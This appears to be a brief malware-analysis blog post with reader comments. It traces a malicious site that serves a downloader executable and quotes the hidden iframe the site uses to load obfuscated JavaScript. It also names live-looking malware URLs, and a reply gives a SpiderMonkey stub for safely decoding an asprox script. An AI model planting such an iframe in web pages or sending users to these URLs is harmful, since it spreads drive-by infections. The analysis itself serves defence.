the URL contains links to http://www.ok2bstr8.com/view.exe

view.exe is a downloader – VT analysis

The URL also has an iframe embedded:

<iframe id="01" src="2.html" frameborder="0" style="display:none"></iframe>

2.html links to malicious obfuscated JS:

<meta http-equiv="refresh" content="2;URL=">

The above IP is associated with many domains such as minimal345.com


2 Responses to "www.ok2bstr8.com/index_13.html"

  1. Hello, wondering if you’ve been able to decode the new script being used by asprox. Sample @ http://92prt.ru/cgi-bin/index.cgi?script

    I have not been able to do so using SpiderMonkey; I'm wondering if you've done some analysis on this before.


  2. First, strip the HTML entities off the "index.cgi?script" content.

    Second, create a stub file, stub.js, with the following contents:
    // eval() is redefined so each decoded stage is printed instead of executed
    function eval(a) { print(a); }
    // minimal browser objects the script expects to find
    location = new Object();
    location.href = "http://92prt.ru/cgi-bin/index.cgi?script";
    document = new Object();
    document = { write: print };   // document.write() prints its argument
    navigator = new Object();
    navigator.appMinorVersion = ";SP2;";
    navigator.systemLanguage = "en-us";

    Then issue the command "js -f stub.js index.cgi\?script"
